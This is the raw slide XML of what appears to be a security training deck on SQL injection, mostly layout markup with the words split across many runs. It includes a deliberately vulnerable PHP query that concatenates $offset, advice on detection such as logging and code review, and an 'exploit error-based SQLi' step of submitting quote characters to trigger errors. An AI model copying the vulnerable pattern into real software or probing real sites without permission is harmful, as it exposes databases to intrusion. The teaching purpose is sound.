                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-235">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>beware, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>validati  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on!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3099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$query </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>products </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-170">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DER </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-185">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BY </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>LIMIT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OFFSET</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-165">
                <a:solidFill>
                  <a:srgbClr val="DD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00BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$offset</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>;"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="0077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 spc="-20">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$result </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pg_query</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$conn</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="007700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0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="0077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27297" y="7334091"/>
            <a:ext cx="17780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90">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?&gt;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7989" y="2670358"/>
            <a:ext cx="11799570" cy="671512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1165"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-295">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>logging</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="1070"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>logging</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="1165"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Map </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-365">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Visible </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>functionality in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565">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4290"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="805"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-385">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Regex </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>instances </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>talk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to 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10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> database</a:t>
            </a:r>
            <a:endParaRPr sz="395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spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>review!</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Follow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200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>path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10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>input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165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vectors</a:t>
            </a:r>
            <a:endParaRPr sz="395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spcBef>
                <a:spcPts val="1040"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-385">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>potential </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerabilities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190779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="207949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20102843" y="207949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20102843" y="190779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817964" y="190779"/>
            <a:ext cx="8285480" cy="11118215"/>
            <a:chOff x="11817964" y="190779"/>
            <a:chExt cx="8285480" cy="11118215"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14010044" y="5282352"/>
              <a:ext cx="4960686" cy="46113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17964" y="190779"/>
              <a:ext cx="8285480" cy="11118215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8285480" h="11118215">
                  <a:moveTo>
                    <a:pt x="8284878" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11117776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8284878" y="11117776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828487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663248" y="3666485"/>
              <a:ext cx="4812418" cy="4339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9381" y="4546741"/>
            <a:ext cx="9585960" cy="253873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250" spc="-195" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>HOW </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-1110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>TO </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-1065">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>EXPLOIT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-985">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLI  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-930">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITIES?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1218882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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-320"/>
              <a:t>Error-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-844"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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4752" y="2931714"/>
            <a:ext cx="16287750" cy="220472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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
                <a:tab pos="10054590" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL-specific </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>characters </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-425">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-250">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>",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210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>look</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-250">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>errors</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-250">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-250">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>anomalies</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Different </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>characters </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-295">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>give </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-455">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>errors</a:t>
            </a:r>
            <a:endParaRPr sz="4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817964" y="167220"/>
            <a:ext cx="8285480" cy="11141710"/>
            <a:chOff x="11817964" y="167220"/>
            <a:chExt cx="8285480" cy="11141710"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11817964" y="167220"/>
              <a:ext cx="8285480" cy="11141710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8285480" h="11141710">
                  <a:moveTo>
                    <a:pt x="8284878" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11141335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8284878" y="11141335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8284878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474772" y="2942737"/>
              <a:ext cx="5234605" cy="5023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66108" y="4081834"/>
            <a:ext cx="5552440" cy="253873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92100" marR="5080" indent="-280035">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
